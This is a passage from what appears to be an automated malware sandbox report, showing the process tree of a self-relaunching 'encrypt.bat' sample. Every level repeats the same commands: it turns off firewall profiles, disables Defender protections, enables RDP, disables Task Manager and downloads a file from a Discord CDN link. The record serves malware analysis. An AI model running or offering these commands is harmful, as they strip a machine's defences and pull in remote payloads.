                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          netsh advfirewall set publicprofile state off
                                                                                                          12⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          PID:452
                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          netsh advfirewall set allprofiles state off
                                                                                                          12⤵
                                                                                                            PID:4476
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                            12⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2604
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                            12⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5016
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                            12⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4480
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                            12⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3516
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                            12⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1544
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                            12⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2308
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                            12⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4332
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                            12⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2844
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                              13⤵
                                                                                                                PID:4636
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                  14⤵
                                                                                                                    PID:3792
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                    14⤵
                                                                                                                      PID:4568
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                      14⤵
                                                                                                                        PID:1764
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                        14⤵
                                                                                                                          PID:1912
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                          14⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:936
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                          14⤵
                                                                                                                            PID:4168
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                            14⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:5032
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                            14⤵
                                                                                                                              PID:3460
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                              14⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:1092
                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                              netsh firewall set opmode disable
                                                                                                                              14⤵
                                                                                                                              • Modifies Windows Firewall
                                                                                                                              PID:4568
                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                              netsh firewall set opmode mode=DISABLE
                                                                                                                              14⤵
                                                                                                                                PID:4644
                                                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                                                netsh advfirewall set currentprofile state off
                                                                                                                                14⤵
                                                                                                                                  PID:3204
                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                  netsh advfirewall set domainprofile state off
                                                                                                                                  14⤵
                                                                                                                                    PID:1012
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh advfirewall set privateprofile state off
                                                                                                                                    14⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    PID:1540
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh advfirewall set publicprofile state off
                                                                                                                                    14⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    PID:3576
                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                    netsh advfirewall set allprofiles state off
                                                                                                                                    14⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    PID:4292
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                    14⤵
                                                                                                                                      PID:816
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                      14⤵
                                                                                                                                        PID:1564
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                        14⤵
                                                                                                                                          PID:4476
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                          14⤵
                                                                                                                                            PID:1524
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                            14⤵
                                                                                                                                              PID:208
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                              14⤵
                                                                                                                                                PID:4568
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                14⤵
                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                PID:4116
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                14⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:3468
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                  15⤵
                                                                                                                                                    PID:1212
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                      16⤵
                                                                                                                                                        PID:440
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                        16⤵
                                                                                                                                                          PID:3356
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                          16⤵
                                                                                                                                                            PID:4648
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                            16⤵
                                                                                                                                                              PID:4684
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                              16⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4256
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                              16⤵
                                                                                                                                                                PID:4804
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                16⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:1552
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                16⤵
                                                                                                                                                                  PID:3460
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                  16⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  PID:4512
                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                  netsh firewall set opmode disable
                                                                                                                                                                  16⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:3728
                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                  netsh firewall set opmode mode=DISABLE
                                                                                                                                                                  16⤵
                                                                                                                                                                    PID:2060
                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                    netsh advfirewall set currentprofile state off
                                                                                                                                                                    16⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    PID:3468
                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                    netsh advfirewall set domainprofile state off
                                                                                                                                                                    16⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    PID:440
                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                    netsh advfirewall set privateprofile state off
                                                                                                                                                                    16⤵
                                                                                                                                                                      PID:3764
                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                      netsh advfirewall set publicprofile state off
                                                                                                                                                                      16⤵
                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                      PID:3980
                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                      netsh advfirewall set allprofiles state off
                                                                                                                                                                      16⤵
                                                                                                                                                                        PID:3412
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                        16⤵
                                                                                                                                                                          PID:3356
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                          16⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:1912
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                          16⤵
                                                                                                                                                                            PID:404
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                            16⤵
                                                                                                                                                                              PID:4568
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                              16⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:5048
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                              16⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:2512
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                              16⤵
                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:1928
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                              16⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              PID:1184
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                17⤵
                                                                                                                                                                                  PID:4568
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                    18⤵
                                                                                                                                                                                      PID:2604
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                      18⤵
                                                                                                                                                                                        PID:4752
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                        18⤵
                                                                                                                                                                                          PID:3172
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                          18⤵
                                                                                                                                                                                            PID:1552
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                            18⤵
                                                                                                                                                                                              PID:692
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                              18⤵
                                                                                                                                                                                                PID:728
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                18⤵
                                                                                                                                                                                                  PID:4920
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                    PID:2488
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                      PID:744
                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                      netsh firewall set opmode disable
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      PID:1928
                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                      netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      PID:1804
                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                      netsh advfirewall set currentprofile state off
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      PID:3208
                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                      netsh advfirewall set domainprofile state off
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      PID:3052
                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                      netsh advfirewall set privateprofile state off
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                      netsh advfirewall set publicprofile state off
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      PID:3088
                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                      netsh advfirewall set allprofiles state off
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      PID:4168
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                        PID:396
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        PID:3540
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        PID:5016
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                          PID:728
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                            PID:864
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                              PID:3984
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              PID:2008
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:3516
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                  PID:3360
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                      PID:4396
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                        PID:1544
                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                          PID:208
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                            PID:4544
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            PID:440
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                              PID:3196
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                                PID:4804
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                  PID:744
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                    PID:208
                                                                                                                                                                                                                                  • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                    netsh firewall set opmode disable
                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                      PID:4144
                                                                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                      netsh firewall set opmode mode=DISABLE
                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                        PID:4520
                                                                                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                        netsh advfirewall set currentprofile state off
                                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                                          PID:1764
                                                                                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                          netsh advfirewall set domainprofile state off
                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                            PID:3248
                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                            netsh advfirewall set privateprofile state off
                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                                                                            PID:3196
                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                            netsh advfirewall set publicprofile state off
                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                              PID:436
                                                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                              netsh advfirewall set allprofiles state off
                                                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                              PID:3052
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                                                PID:2088
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                                  PID:2568
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                  PID:404
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                    PID:4168
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    PID:208
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                                      PID:1800
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                      PID:3208
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                      PID:4168
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                                                                                                                                                                                        21⤵
                                                                                                                                                                                                                                                          PID:4840
                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                            reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                                                                                                                                                                                            22⤵
